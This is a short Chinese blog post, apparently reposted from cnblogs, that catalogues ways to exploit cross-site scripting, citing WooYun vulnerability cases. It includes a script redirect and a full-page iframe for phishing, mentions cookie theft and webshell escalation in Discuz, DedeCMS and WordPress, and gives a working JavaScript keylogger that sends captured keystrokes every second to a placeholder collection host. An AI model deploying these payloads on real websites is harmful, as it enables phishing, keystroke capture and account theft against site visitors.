标签:blog http ar io os sp java on 文件
XSS在客户端执行 可以任意执行js代码
0x01 xss 的利用方式
1. 钓鱼 案例:http://www.wooyun.org/bugs/wooyun-2014-076685 我是如何通过一个 XSS 探测搜狐内网扫描内网并且蠕动到前台的
2.钓鱼,伪造操作界面钓鱼
直接跳转
<script>document.location.href="http://test.com/xxx.htm"
iframe钓鱼
<iframe src="http://test.com/11.htm" heigt="100%" width="100%">
flash钓鱼
http://www.wooyun.org/bugs/wooyun-2010-02532
3.弹广告刷流量
4.任意POST/GET操作
如在dz中 后台的储存型XSS可以get uckey,或者get webshell 案例
http://www.wooyun.org/bugs/wooyun-2010-045716
在dedecms中 一个储存XSS配合后台文件管理器 getshell
案例: dedecms利用xss+csrf getshell
http://huakai.paxmac.org/?p=587
wordpess中储存XSS配合模板getshell
5.html5 中还可以截图
6.窃取cookies
XSS盲打类的
7.XSS键盘记录
var keys=‘‘;document.onkeypress = function(e)
{ get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;}window.setInterval(function()
{
new Image().src = ‘http://yourhost.com/g.php?c=‘+keys; keys = ‘‘;}, 1000);
8.客户端信息的刺探
扫描内网
自动提交st2漏洞(案列在黑哥的PPT里面)
ip地址
9.xssworm
10.ddos
标签:blog http ar io os sp java on 文件
原文地址:http://www.cnblogs.com/dongchi/p/4166799.html